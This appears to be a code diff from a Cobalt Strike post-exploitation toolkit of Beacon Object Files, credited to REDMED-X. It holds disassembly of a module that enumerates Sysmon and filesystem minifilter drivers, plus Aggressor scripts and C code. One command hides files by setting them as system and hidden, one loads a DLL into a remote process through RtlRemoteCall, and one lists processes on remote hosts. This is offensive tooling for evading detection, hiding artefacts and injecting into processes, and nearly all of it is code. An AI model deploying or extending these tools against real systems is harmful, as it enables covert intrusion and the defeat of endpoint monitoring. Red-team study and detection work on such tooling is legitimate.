+  0000000000000B52: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$free]
+  0000000000000B58: 33 C0              xor         eax,eax
+  0000000000000B5A: 48 83 C4 58        add         rsp,58h
+  0000000000000B5E: C3                 ret
+  0000000000000B5F: CC                 int         3
+  0000000000000B60: CC                 int         3
+  0000000000000B61: CC                 int         3
+  0000000000000B62: CC                 int         3
+  0000000000000B63: CC                 int         3
+  0000000000000B64: CC                 int         3
+  0000000000000B65: CC                 int         3
+  0000000000000B66: CC                 int         3
+  0000000000000B67: CC                 int         3
+  0000000000000B68: CC                 int         3
+  0000000000000B69: CC                 int         3
+  0000000000000B6A: CC                 int         3
+  0000000000000B6B: CC                 int         3
+  0000000000000B6C: CC                 int         3
+  0000000000000B6D: CC                 int         3
+  0000000000000B6E: CC                 int         3
+  0000000000000B6F: CC                 int         3
+FindMiniFilters:
+  0000000000000B70: 48 83 EC 68        sub         rsp,68h
+  0000000000000B74: C7 44 24 38 00 04  mov         dword ptr [rsp+38h],400h
+                    00 00
+  0000000000000B7C: 8B 44 24 38        mov         eax,dword ptr [rsp+38h]
+  0000000000000B80: 48 89 44 24 48     mov         qword ptr [rsp+48h],rax
+  0000000000000B85: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  0000000000000B8B: 48 8B 4C 24 48     mov         rcx,qword ptr [rsp+48h]
+  0000000000000B90: 4C 8B C1           mov         r8,rcx
+  0000000000000B93: 33 D2              xor         edx,edx
+  0000000000000B95: 48 8B C8           mov         rcx,rax
+  0000000000000B98: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapAlloc]
+  0000000000000B9E: 48 89 44 24 40     mov         qword ptr [rsp+40h],rax
+  0000000000000BA3: C7 44 24 34 00 00  mov         dword ptr [rsp+34h],0
+                    00 00
+  0000000000000BAB: 8B 44 24 38        mov         eax,dword ptr [rsp+38h]
+  0000000000000BAF: 48 8D 4C 24 50     lea         rcx,[rsp+50h]
+  0000000000000BB4: 48 89 4C 24 20     mov         qword ptr [rsp+20h],rcx
+  0000000000000BB9: 4C 8D 4C 24 3C     lea         r9,[rsp+3Ch]
+  0000000000000BBE: 44 8B C0           mov         r8d,eax
+  0000000000000BC1: 48 8B 54 24 40     mov         rdx,qword ptr [rsp+40h]
+  0000000000000BC6: B9 02 00 00 00     mov         ecx,2
+  0000000000000BCB: FF 15 00 00 00 00  call        qword ptr [__imp_Fltlib$FilterFindFirst]
+  0000000000000BD1: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  0000000000000BD5: 81 7C 24 30 03 01  cmp         dword ptr [rsp+30h],80070103h
+                    07 80
+  0000000000000BDD: 75 09              jne         0000000000000BE8
+  0000000000000BDF: 8B 44 24 34        mov         eax,dword ptr [rsp+34h]
+  0000000000000BE3: E9 A8 00 00 00     jmp         0000000000000C90
+  0000000000000BE8: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  0000000000000BED: 74 09              je          0000000000000BF8
+  0000000000000BEF: 8B 44 24 34        mov         eax,dword ptr [rsp+34h]
+  0000000000000BF3: E9 98 00 00 00     jmp         0000000000000C90
+  0000000000000BF8: 48 8D 0D 00 00 00  lea         rcx,[$SG105287]
+                    00
+  0000000000000BFF: E8 00 00 00 00     call        BeaconPrintToStreamW
+  0000000000000C04: 48 8D 0D 00 00 00  lea         rcx,[$SG105288]
+                    00
+  0000000000000C0B: E8 00 00 00 00     call        BeaconPrintToStreamW
+  0000000000000C10: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  0000000000000C15: E8 00 00 00 00     call        PrintMiniFilterData
+  0000000000000C1A: C7 44 24 34 01 00  mov         dword ptr [rsp+34h],1
+                    00 00
+  0000000000000C22: 33 C0              xor         eax,eax
+  0000000000000C24: 83 F8 01           cmp         eax,1
+  0000000000000C27: 74 4D              je          0000000000000C76
+  0000000000000C29: 48 8D 44 24 3C     lea         rax,[rsp+3Ch]
+  0000000000000C2E: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  0000000000000C33: 44 8B 4C 24 38     mov         r9d,dword ptr [rsp+38h]
+  0000000000000C38: 4C 8B 44 24 40     mov         r8,qword ptr [rsp+40h]
+  0000000000000C3D: BA 02 00 00 00     mov         edx,2
+  0000000000000C42: 48 8B 4C 24 50     mov         rcx,qword ptr [rsp+50h]
+  0000000000000C47: FF 15 00 00 00 00  call        qword ptr [__imp_Fltlib$FilterFindNext]
+  0000000000000C4D: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  0000000000000C51: 81 7C 24 30 03 01  cmp         dword ptr [rsp+30h],80070103h
+                    07 80
+  0000000000000C59: 75 02              jne         0000000000000C5D
+  0000000000000C5B: EB 19              jmp         0000000000000C76
+  0000000000000C5D: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  0000000000000C62: 74 06              je          0000000000000C6A
+  0000000000000C64: 8B 44 24 34        mov         eax,dword ptr [rsp+34h]
+  0000000000000C68: EB 26              jmp         0000000000000C90
+  0000000000000C6A: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  0000000000000C6F: E8 00 00 00 00     call        PrintMiniFilterData
+  0000000000000C74: EB AC              jmp         0000000000000C22
+  0000000000000C76: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  0000000000000C7C: 4C 8B 44 24 40     mov         r8,qword ptr [rsp+40h]
+  0000000000000C81: 33 D2              xor         edx,edx
+  0000000000000C83: 48 8B C8           mov         rcx,rax
+  0000000000000C86: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapFree]
+  0000000000000C8C: 8B 44 24 34        mov         eax,dword ptr [rsp+34h]
+  0000000000000C90: 48 83 C4 68        add         rsp,68h
+  0000000000000C94: C3                 ret
+  0000000000000C95: CC                 int         3
+  0000000000000C96: CC                 int         3
+  0000000000000C97: CC                 int         3
+  0000000000000C98: CC                 int         3
+  0000000000000C99: CC                 int         3
+  0000000000000C9A: CC                 int         3
+  0000000000000C9B: CC                 int         3
+  0000000000000C9C: CC                 int         3
+  0000000000000C9D: CC                 int         3
+  0000000000000C9E: CC                 int         3
+  0000000000000C9F: CC                 int         3
+go:
+  0000000000000CA0: 89 54 24 10        mov         dword ptr [rsp+10h],edx
+  0000000000000CA4: 48 89 4C 24 08     mov         qword ptr [rsp+8],rcx
+  0000000000000CA9: 48 83 EC 58        sub         rsp,58h
+  0000000000000CAD: C7 44 24 20 00 00  mov         dword ptr [rsp+20h],0
+                    00 00
+  0000000000000CB5: 44 8B 44 24 68     mov         r8d,dword ptr [rsp+68h]
+  0000000000000CBA: 48 8B 54 24 60     mov         rdx,qword ptr [rsp+60h]
+  0000000000000CBF: 48 8D 4C 24 30     lea         rcx,[rsp+30h]
+  0000000000000CC4: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconDataParse]
+  0000000000000CCA: 33 D2              xor         edx,edx
+  0000000000000CCC: 48 8D 4C 24 30     lea         rcx,[rsp+30h]
+  0000000000000CD1: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconDataExtract]
+  0000000000000CD7: 48 89 44 24 28     mov         qword ptr [rsp+28h],rax
+  0000000000000CDC: 48 8D 15 00 00 00  lea         rdx,[$SG105304]
+                    00
+  0000000000000CE3: 48 8B 4C 24 28     mov         rcx,qword ptr [rsp+28h]
+  0000000000000CE8: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$strcmp]
+  0000000000000CEE: 85 C0              test        eax,eax
+  0000000000000CF0: 75 3E              jne         0000000000000D30
+  0000000000000CF2: E8 00 00 00 00     call        FindSysmon
+  0000000000000CF7: 89 44 24 20        mov         dword ptr [rsp+20h],eax
+  0000000000000CFB: 83 7C 24 20 00     cmp         dword ptr [rsp+20h],0
+  0000000000000D00: 75 18              jne         0000000000000D1A
+  0000000000000D02: 48 8D 15 00 00 00  lea         rdx,[$SG105307]
+                    00
+  0000000000000D09: 33 C9              xor         ecx,ecx
+  0000000000000D0B: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000D11: 33 C0              xor         eax,eax
+  0000000000000D13: E9 80 00 00 00     jmp         0000000000000D98
+  0000000000000D18: EB 14              jmp         0000000000000D2E
+  0000000000000D1A: E8 00 00 00 00     call        BeaconOutputStreamW
+  0000000000000D1F: 48 8D 15 00 00 00  lea         rdx,[$SG105308]
+                    00
+  0000000000000D26: 33 C9              xor         ecx,ecx
+  0000000000000D28: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000D2E: EB 66              jmp         0000000000000D96
+  0000000000000D30: 48 8D 15 00 00 00  lea         rdx,[$SG105311]
+                    00
+  0000000000000D37: 48 8B 4C 24 28     mov         rcx,qword ptr [rsp+28h]
+  0000000000000D3C: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$strcmp]
+  0000000000000D42: 85 C0              test        eax,eax
+  0000000000000D44: 75 3E              jne         0000000000000D84
+  0000000000000D46: E8 00 00 00 00     call        FindMiniFilters
+  0000000000000D4B: 89 44 24 20        mov         dword ptr [rsp+20h],eax
+  0000000000000D4F: 83 7C 24 20 00     cmp         dword ptr [rsp+20h],0
+  0000000000000D54: 75 18              jne         0000000000000D6E
+  0000000000000D56: 48 8D 15 00 00 00  lea         rdx,[$SG105314]
+                    00
+  0000000000000D5D: B9 0D 00 00 00     mov         ecx,0Dh
+  0000000000000D62: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000D68: 33 C0              xor         eax,eax
+  0000000000000D6A: EB 2C              jmp         0000000000000D98
+  0000000000000D6C: EB 14              jmp         0000000000000D82
+  0000000000000D6E: E8 00 00 00 00     call        BeaconOutputStreamW
+  0000000000000D73: 48 8D 15 00 00 00  lea         rdx,[$SG105315]
+                    00
+  0000000000000D7A: 33 C9              xor         ecx,ecx
+  0000000000000D7C: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000D82: EB 12              jmp         0000000000000D96
+  0000000000000D84: 48 8D 15 00 00 00  lea         rdx,[$SG105316]
+                    00
+  0000000000000D8B: B9 0D 00 00 00     mov         ecx,0Dh
+  0000000000000D90: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000D96: 33 C0              xor         eax,eax
+  0000000000000D98: 48 83 C4 58        add         rsp,58h
+  0000000000000D9C: C3                 ret
+
+  Summary
+
+          38 .chks64
+         5DA .data
+          84 .debug$S
+          DA .drectve
+          54 .pdata
+         D9D .text$mn
+          3C .xdata

KIT/HideFile/hidefile.cna

@@ -1,42 +1,41 @@
 # author REDMED-X
 
 beacon_command_register(
-	"hidefile", "Hide file or directory by setting it's attributes to systemfile + hidden.\n",
-	"INFO:\nHide a directory or file from plain sight by modifying the attributes and set them to systemfile + hidden.\n\nOPTIONS:\n[dir]: set this option if you want to modify the attributes of a directory.\n[file]: set this option if you want to modify the attributes of a file.\n[<path to dir/file>]: path to the directory or file that you want to hide.\n\n" .
-	"USAGE:\nhidefile <dir | file> <path to dir/file>\n\n");
+    "hidefile", "Hide file or directory by setting it's attributes to systemfile + hidden.\n",
+    "INFO:\nHide a directory or file from plain sight by modifying the attributes and set them to systemfile + hidden.\n\nOPTIONS:\n[dir]: set this option if you want to modify the attributes of a directory.\n[file]: set this option if you want to modify the attributes of a file.\n[<path to dir/file>]: path to the directory or file that you want to hide.\n\n" .
+    "USAGE:\nhidefile <dir | file> <path to dir/file>\n\n");
 
 
 alias hidefile {
     $bid = $1;
     $option = $2;
-	$path = $3;
-
-
-	if ($option eq "") {
-		berror($bid, "Please specify one of the following options: dir | file\n");
-		return;
-	}
-	
-	if ($option eq "dir" || $option eq "file") {
-		if ($path eq "") {
-			berror($bid, "Please specify the correct path to the target directory or file.\n");
-			return;
-		}
-	}
-	else {
-		berror($bid, "This option isn't supported. Please specify one of the following options: dir | file\n");
-		return;
-	}
-	
+    $path = $3;
+
+    if ($option eq "") {
+        berror($bid, "Please specify one of the following options: dir | file\n");
+        return;
+    }
+
+    if ($option eq "dir" || $option eq "file") {
+        if ($path eq "") {
+            berror($bid, "Please specify the correct path to the target directory or file.\n");
+            return;
+        }
+    }
+    else {
+        berror($bid, "This option isn't supported. Please specify one of the following options: dir | file\n");
+        return;
+    }
+
     # Read in the right BOF file
     $handle = openf(script_resource("hidefile.o"));
     $data   = readb($handle, -1);
     closef($handle);
 
-	# Pack our arguments
+    # Pack our arguments
     $arg_data  = bof_pack($bid, "zZ", $option, $path);
-	
-	blog($bid, "Tasked to hide directory or file..");
+
+    blog($bid, "Tasked to hide directory or file..");
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

KIT/LoadLib/loadlib.cna

@@ -1,33 +1,31 @@
 # author REDMED-X
 
 beacon_command_register(
-	"loadlib", "Load DLL from disk in remote process via RPC call.",
-	"INFO:\nLoad a on disk present DLL via RtlRemoteCall API in a remote process.\nDepending on the process from which you run this tool, it may or may not work.\n\nOPTIONS:\n[pid]: target process to load the DLL into\n[path]: full path to the on disk present DLL\n\n" .
-	"USAGE:\nloadlib <pid> <path to dll>\n\n");
+    "loadlib", "Load DLL from disk in remote process via RPC call.",
+    "INFO:\nLoad a on disk present DLL via RtlRemoteCall API in a remote process.\nDepending on the process from which you run this tool, it may or may not work.\n\nOPTIONS:\n[pid]: target process to load the DLL into\n[path]: full path to the on disk present DLL\n\n" .
+    "USAGE:\nloadlib <pid> <path to dll>\n\n");
 
 
 alias loadlib {
     $bid = $1;
     $pid = $2;
     $path = $3;
-	
-	if ($pid eq "" || $path eq "") {
-		berror($bid, "Please make sure that both the PID and PATH are specified.");
-		return;
-	}
-	
-	
+
+    if ($pid eq "" || $path eq "") {
+        berror($bid, "Please make sure that both the PID and PATH are specified.");
+        return;
+    }
+
     # Read in the right BOF file
     $handle = openf(script_resource("loadlib.o"));
     $data   = readb($handle, -1);
     closef($handle);
-	
-	
+
     # Pack our arguments
     $arg_data  = bof_pack($bid, "iz", $pid, $path);
-    
-	blog($bid, "Tasked to load DLL in remote process..");
-	
+
+    blog($bid, "Tasked to load DLL in remote process..");
+
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

KIT/PSremote/psremote.c

@@ -98,16 +98,17 @@ CleanUp:
 }
 
 
-int ListProcesses(HANDLE handleTargetHost) {
+BOOL ListProcesses(HANDLE handleTargetHost) {
 
 	WTS_PROCESS_INFOA * proc_info;
 	DWORD pi_count = 0;
 	LPSTR procName; 
 	WCHAR WCprocName[256];
+	BOOL RemoteProc = FALSE;
 	
 	if (!WTSAPI32$WTSEnumerateProcessesA(handleTargetHost, 0, 1, &proc_info, &pi_count)) {
 		 BeaconPrintf(CALLBACK_ERROR, "Failed to get a valid handle to the specified host!\n");
-		return -1;
+		return RemoteProc;
 	}
 	
 	BeaconPrintToStreamW(L"\nProcess name\t\t\t\tPID\t\t\tSessionID\n");
@@ -116,9 +117,10 @@ int ListProcesses(HANDLE handleTargetHost) {
 		procName = proc_info[i].pProcessName;
 		KERNEL32$MultiByteToWideChar(CP_ACP, 0, procName, -1, WCprocName, 256);
 		BeaconPrintToStreamW(L"%-40s\t%d\t%23d\n",WCprocName ,proc_info[i].ProcessId ,proc_info[i].SessionId);
+		RemoteProc = TRUE;
 	}
 	WTSAPI32$WTSCloseServer(handleTargetHost);
-	return 0;
+	return RemoteProc;
 }
 
 void go(char *args, int len) {
@@ -127,7 +129,7 @@ void go(char *args, int len) {
 	datap parser;
 	DWORD argSize = NULL;
 	HANDLE handleTargetHost = NULL;
-	int res;
+	BOOL res = NULL;
 
 	BeaconDataParse(&parser, args, len);
     hostName = BeaconDataExtract(&parser, &argSize);
@@ -135,7 +137,14 @@ void go(char *args, int len) {
 	handleTargetHost = WTSAPI32$WTSOpenServerA(hostName);
 	res = ListProcesses(handleTargetHost);
 	
-	BeaconOutputStreamW();
+	if(!res) {
+		BeaconPrintf(CALLBACK_ERROR, "[-] Couldn't list remote processes. Do you have enough privileges on the remote host?\n");
+		return 0;
+	}
+	else  {
+		BeaconOutputStreamW();
+		BeaconPrintf(CALLBACK_OUTPUT, "[+] DONE");
+	}
 
 	return 0;
 }

KIT/PSremote/psremote.cna

@@ -1,33 +1,29 @@
 # author REDMED-X
 
 beacon_command_register(
-	"psremote", "List all running processes on a remote host.\n",
-	"INFO:\nGet a list of all processes running on the remote host.\n\n" .
-	"USAGE:\npsremote <FQDN or IP remote host>\n\n");
+    "psremote", "List all running processes on a remote host.\n",
+    "INFO:\nGet a list of all processes running on the remote host.\n\n" .
+    "USAGE:\npsremote <FQDN or IP remote host>\n\n");
 
 
 alias psremote {
-	local('$handle $data $args');
-	
-	# figure out the arch of this session
     $bid = $1;
-	$remotehost = $2;
-	
-	
-	if ($remotehost eq "") {
-		berror($bid, "Please make sure that the FQDN or IP of the remote host is specified.");
-		return;
-	}
-	
-	# read in the right BOF file
-	$handle = openf(script_resource("psremote.o"));
-	$data = readb($handle, -1);
-	closef($handle);
-
-	# pack our arguments
-	$arg_data = bof_pack($1, "z", $remotehost);
-	
-	# execute it.
-	blog($bid, "Tasked to list processes of host: $+  $remotehost");
-	beacon_inline_execute($bid, $data, "go", $arg_data);
-}
+    $remotehost = $2;
+
+    if ($remotehost eq "") {
+        berror($bid, "Please make sure that the FQDN or IP of the remote host is specified.");
+        return;
+    }
+
+    # read in the right BOF file
+    $handle = openf(script_resource("psremote.o"));
+    $data = readb($handle, -1);
+    closef($handle);
+
+    # pack our arguments
+    $arg_data = bof_pack($bid, "z", $remotehost);
+
+    blog($bid, "Tasked to list processes of host: $+  $remotehost");
+    beacon_inline_execute($bid, $data, "go", $arg_data);
+}
+

KIT/PSremote/psremote.disasm

@@ -0,0 +1,360 @@
+Microsoft (R) COFF/PE Dumper Version 14.29.30148.0
+Copyright (C) Microsoft Corporation.  All rights reserved.
+
+
+Dump of file psremote.o
+
+File Type: COFF OBJECT
+
+BeaconPrintToStreamW:
+  0000000000000000: 48 89 4C 24 08     mov         qword ptr [rsp+8],rcx
+  0000000000000005: 48 89 54 24 10     mov         qword ptr [rsp+10h],rdx
+  000000000000000A: 4C 89 44 24 18     mov         qword ptr [rsp+18h],r8
+  000000000000000F: 4C 89 4C 24 20     mov         qword ptr [rsp+20h],r9
+  0000000000000014: 48 83 EC 58        sub         rsp,58h
+  0000000000000018: C7 44 24 30 01 00  mov         dword ptr [rsp+30h],1
+                    00 00
+  0000000000000020: C7 44 24 34 00 00  mov         dword ptr [rsp+34h],0
+                    00 00
+  0000000000000028: 48 83 3D 00 00 00  cmp         qword ptr [g_lpStream],1
+                    00 01
+  0000000000000030: 77 28              ja          000000000000005A
+  0000000000000032: 4C 8D 05 00 00 00  lea         r8,[g_lpStream]
+                    00
+  0000000000000039: BA 01 00 00 00     mov         edx,1
+  000000000000003E: 33 C9              xor         ecx,ecx
+  0000000000000040: FF 15 00 00 00 00  call        qword ptr [__imp_OLE32$CreateStreamOnHGlobal]
+  0000000000000046: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000004A: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  000000000000004F: 7D 09              jge         000000000000005A
+  0000000000000051: 8B 44 24 30        mov         eax,dword ptr [rsp+30h]
+  0000000000000055: E9 01 01 00 00     jmp         000000000000015B
+  000000000000005A: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],1
+                    00 01
+  0000000000000062: 77 2E              ja          0000000000000092
+  0000000000000064: BA 02 00 00 00     mov         edx,2
+  0000000000000069: B9 00 20 00 00     mov         ecx,2000h
+  000000000000006E: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$calloc]
+  0000000000000074: 48 89 05 00 00 00  mov         qword ptr [g_lpwPrintBuffer],rax
+                    00
+  000000000000007B: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],0
+                    00 00
+  0000000000000083: 75 0D              jne         0000000000000092
+  0000000000000085: C7 44 24 30 05 40  mov         dword ptr [rsp+30h],80004005h
+                    00 80
+  000000000000008D: E9 9D 00 00 00     jmp         000000000000012F
+  0000000000000092: 48 8D 44 24 68     lea         rax,[rsp+68h]
+  0000000000000097: 48 89 44 24 38     mov         qword ptr [rsp+38h],rax
+  000000000000009C: 48 8B 44 24 38     mov         rax,qword ptr [rsp+38h]
+  00000000000000A1: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  00000000000000A6: 4C 8B 4C 24 60     mov         r9,qword ptr [rsp+60h]
+  00000000000000AB: 41 B8 FF 1F 00 00  mov         r8d,1FFFh
+  00000000000000B1: BA 00 20 00 00     mov         edx,2000h
+  00000000000000B6: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  00000000000000BD: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$_vsnwprintf_s]
+  00000000000000C3: 85 C0              test        eax,eax
+  00000000000000C5: 75 0A              jne         00000000000000D1
+  00000000000000C7: C7 44 24 30 05 40  mov         dword ptr [rsp+30h],80004005h
+                    00 80
+  00000000000000CF: EB 5E              jmp         000000000000012F
+  00000000000000D1: 48 83 3D 00 00 00  cmp         qword ptr [g_lpStream],0
+                    00 00
+  00000000000000D9: 74 4C              je          0000000000000127
+  00000000000000DB: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  00000000000000E2: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$wcslen]
+  00000000000000E8: 8B C0              mov         eax,eax
+  00000000000000EA: 48 D1 E0           shl         rax,1
+  00000000000000ED: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  00000000000000F4: 48 8B 09           mov         rcx,qword ptr [rcx]
+  00000000000000F7: 48 89 4C 24 40     mov         qword ptr [rsp+40h],rcx
+  00000000000000FC: 4C 8D 4C 24 34     lea         r9,[rsp+34h]
+  0000000000000101: 44 8B C0           mov         r8d,eax
+  0000000000000104: 48 8B 15 00 00 00  mov         rdx,qword ptr [g_lpwPrintBuffer]
+                    00
+  000000000000010B: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  0000000000000112: 48 8B 44 24 40     mov         rax,qword ptr [rsp+40h]
+  0000000000000117: FF 50 20           call        qword ptr [rax+20h]
+  000000000000011A: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000011E: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  0000000000000123: 7D 02              jge         0000000000000127
+  0000000000000125: EB 08              jmp         000000000000012F
+  0000000000000127: C7 44 24 30 00 00  mov         dword ptr [rsp+30h],0
+                    00 00
+  000000000000012F: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],0
+                    00 00
+  0000000000000137: 74 15              je          000000000000014E
+  0000000000000139: 41 B8 00 40 00 00  mov         r8d,4000h
+  000000000000013F: 33 D2              xor         edx,edx
+  0000000000000141: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  0000000000000148: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$memset]
+  000000000000014E: 48 C7 44 24 38 00  mov         qword ptr [rsp+38h],0
+                    00 00 00
+  0000000000000157: 8B 44 24 30        mov         eax,dword ptr [rsp+30h]
+  000000000000015B: 48 83 C4 58        add         rsp,58h
+  000000000000015F: C3                 ret
+  0000000000000160: CC                 int         3
+  0000000000000161: CC                 int         3
+  0000000000000162: CC                 int         3
+  0000000000000163: CC                 int         3
+  0000000000000164: CC                 int         3
+  0000000000000165: CC                 int         3
+  0000000000000166: CC                 int         3
+  0000000000000167: CC                 int         3
+  0000000000000168: CC                 int         3
+  0000000000000169: CC                 int         3
+  000000000000016A: CC                 int         3
+  000000000000016B: CC                 int         3
+  000000000000016C: CC                 int         3
+  000000000000016D: CC                 int         3
+  000000000000016E: CC                 int         3
+  000000000000016F: CC                 int         3
+BeaconOutputStreamW:
+  0000000000000170: 40 57              push        rdi
+  0000000000000172: 48 81 EC A0 00 00  sub         rsp,0A0h
+                    00
+  0000000000000179: 48 8D 44 24 50     lea         rax,[rsp+50h]
+  000000000000017E: 48 8B F8           mov         rdi,rax
+  0000000000000181: 33 C0              xor         eax,eax
+  0000000000000183: B9 50 00 00 00     mov         ecx,50h
+  0000000000000188: F3 AA              rep stos    byte ptr [rdi]
+  000000000000018A: 48 C7 44 24 30 00  mov         qword ptr [rsp+30h],0
+                    00 00 00
+  0000000000000193: C7 44 24 28 00 00  mov         dword ptr [rsp+28h],0
+                    00 00
+  000000000000019B: 48 C7 44 24 20 00  mov         qword ptr [rsp+20h],0
+                    00 00 00
+  00000000000001A4: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  00000000000001AB: 48 8B 00           mov         rax,qword ptr [rax]
+  00000000000001AE: 41 B8 01 00 00 00  mov         r8d,1
+  00000000000001B4: 48 8D 54 24 50     lea         rdx,[rsp+50h]
+  00000000000001B9: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  00000000000001C0: FF 50 60           call        qword ptr [rax+60h]
+  00000000000001C3: 85 C0              test        eax,eax
+  00000000000001C5: 7D 05              jge         00000000000001CC
+  00000000000001C7: E9 13 01 00 00     jmp         00000000000002DF
+  00000000000001CC: 8B 44 24 60        mov         eax,dword ptr [rsp+60h]
+  00000000000001D0: 48 89 44 24 30     mov         qword ptr [rsp+30h],rax
+  00000000000001D5: 48 8B 44 24 30     mov         rax,qword ptr [rsp+30h]
+  00000000000001DA: 48 FF C0           inc         rax
+  00000000000001DD: 48 89 44 24 38     mov         qword ptr [rsp+38h],rax
+  00000000000001E2: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  00000000000001E8: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
+  00000000000001ED: 4C 8B C1           mov         r8,rcx
+  00000000000001F0: BA 08 00 00 00     mov         edx,8
+  00000000000001F5: 48 8B C8           mov         rcx,rax
+  00000000000001F8: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapAlloc]
+  00000000000001FE: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  0000000000000203: 48 83 7C 24 20 00  cmp         qword ptr [rsp+20h],0
+  0000000000000209: 74 6B              je          0000000000000276
+  000000000000020B: 48 C7 44 24 40 00  mov         qword ptr [rsp+40h],0
+                    00 00 00
+  0000000000000214: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  000000000000021B: 48 8B 00           mov         rax,qword ptr [rax]
+  000000000000021E: 45 33 C9           xor         r9d,r9d
+  0000000000000221: 45 33 C0           xor         r8d,r8d
+  0000000000000224: 48 8B 54 24 40     mov         rdx,qword ptr [rsp+40h]
+  0000000000000229: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  0000000000000230: FF 50 28           call        qword ptr [rax+28h]
+  0000000000000233: 85 C0              test        eax,eax
+  0000000000000235: 7D 02              jge         0000000000000239
+  0000000000000237: EB 3D              jmp         0000000000000276
+  0000000000000239: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  0000000000000240: 48 8B 00           mov         rax,qword ptr [rax]
+  0000000000000243: 4C 8D 4C 24 28     lea         r9,[rsp+28h]
+  0000000000000248: 44 8B 44 24 30     mov         r8d,dword ptr [rsp+30h]
+  000000000000024D: 48 8B 54 24 20     mov         rdx,qword ptr [rsp+20h]
+  0000000000000252: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  0000000000000259: FF 50 18           call        qword ptr [rax+18h]
+  000000000000025C: 85 C0              test        eax,eax
+  000000000000025E: 7D 02              jge         0000000000000262
+  0000000000000260: EB 14              jmp         0000000000000276
+  0000000000000262: 4C 8B 44 24 20     mov         r8,qword ptr [rsp+20h]
+  0000000000000267: 48 8D 15 00 00 00  lea         rdx,[$SG99870]
+                    00
+  000000000000026E: 33 C9              xor         ecx,ecx
+  0000000000000270: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000276: 48 83 3D 00 00 00  cmp         qword ptr [g_lpStream],0
+                    00 00
+  000000000000027E: 74 1F              je          000000000000029F
+  0000000000000280: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  0000000000000287: 48 8B 00           mov         rax,qword ptr [rax]
+  000000000000028A: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  0000000000000291: FF 50 10           call        qword ptr [rax+10h]
+  0000000000000294: 48 C7 05 00 00 00  mov         qword ptr [g_lpStream],0
+                    00 00 00 00 00
+  000000000000029F: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],0
+                    00 00
+  00000000000002A7: 74 18              je          00000000000002C1
+  00000000000002A9: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  00000000000002B0: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$free]
+  00000000000002B6: 48 C7 05 00 00 00  mov         qword ptr [g_lpwPrintBuffer],0
+                    00 00 00 00 00
+  00000000000002C1: 48 83 7C 24 20 00  cmp         qword ptr [rsp+20h],0
+  00000000000002C7: 74 16              je          00000000000002DF
+  00000000000002C9: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  00000000000002CF: 4C 8B 44 24 20     mov         r8,qword ptr [rsp+20h]
+  00000000000002D4: 33 D2              xor         edx,edx
+  00000000000002D6: 48 8B C8           mov         rcx,rax
+  00000000000002D9: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapFree]
+  00000000000002DF: 48 81 C4 A0 00 00  add         rsp,0A0h
